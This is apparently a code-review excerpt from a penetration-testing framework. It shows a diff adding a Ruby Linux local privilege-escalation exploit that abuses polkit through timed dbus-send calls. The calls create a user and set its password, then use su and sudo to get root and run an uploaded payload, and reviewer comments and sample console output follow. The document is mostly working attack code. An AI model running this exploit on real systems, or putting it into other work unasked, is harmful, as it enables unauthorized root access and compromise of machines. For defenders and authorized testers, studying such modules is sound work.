modules/exploits/linux/local/polkit_priv_esc.rb

```diff
@@ -0,0 +1,254 @@
+
+  def exploit_set_username
+    cmd_exec(<<~SCRIPT
+      for i in {1..#{datastore['ITERATIONS']}}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.CreateUser
+          string:#{datastore['USERNAME']}#{' '}
+          string:\"#{datastore['USERNAME']}\"#{' '}
+          int32:1 &
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then#{' '}
+          echo \"success\";#{' '}
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def exploit_set_password(uid, hashed_password)
+    cmd_exec(<<~SCRIPT
+      for i in {1..#{datastore['ITERATIONS']}; do
+        dbus-send#{' '}
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply#{' '}
+          /org/freedesktop/Accounts/User#{uid}#{'  '}
+          org.freedesktop.Accounts.User.SetPassword#{' '}
+          string:'#{hashed_password}'#{' '}
+          string: &#{' '}
+        sleep #{datastore['CMDDELAY']}s;
+        kill $!;#{' '}
+        echo #{datastore['PASSWORD']}#{' '}
+        | su - #{datastore['USERNAME']}#{' '}
+        -c \"echo #{datastore['PASSWORD']} | sudo -S id\"#{' '}
+        | grep \"uid=0(root)\";#{' '}
+        if [ $? -eq 0 ]; then#{' '}
+          echo \"success\";
+          break;#{' '}
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def upload_payload
+    fname = "#{datastore['WRITEABLEDIR']}/#{Rex::Text.rand_text_alpha(5)}"
+    upload_and_chmodx(fname, generate_payload_exe)
+    return nil unless file_exist?(fname)
+
+    fname
+  end
+
+  def execute_payload(fname)
+    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
+  end
+
+  # TODO: - use dbus to delete user method
+  def remove_user
+    print_status('Removing the user added: ')
+  end
+
+  def exploit
+    print_status("Attempting to create user #{datastore['USERNAME']}")
+    if exploit_set_username
+      uid = cmd_exec("id -u #{datastore['USERNAME']}")
+      print_good("User #{datastore['USERNAME']} created with UID #{uid}")
+      print_status("Attempting to set the password of the newly create user, #{datastore['USERNAME']}, to: #{datastore['PASSWORD']}")
+      if exploit_set_password(uid, create_unix_crypt_hash)
+        print_good('Obtained code execution has root!')
+        fname = upload_payload
+        execute_payload(fname)
+        # TODO: remove_user
+        remove_user
```

Comment:
Can we remove this, if we don't have the password set? 🤔

Reply:
You can remove the user if the password has not been set. I've made some changes so in the event setting the password fails, we still try to remove the user:
```
[+] User bob created with UID 1020
[*] Attempting to set the password of the newly create user, bob, to: lRD6uvgH
[-] Attempted setting the password 20 times, did not work.
[*] Attempting to remove the user added: 
[+] Successfully removed bob
[*] Exploit completed, but no session was created.
```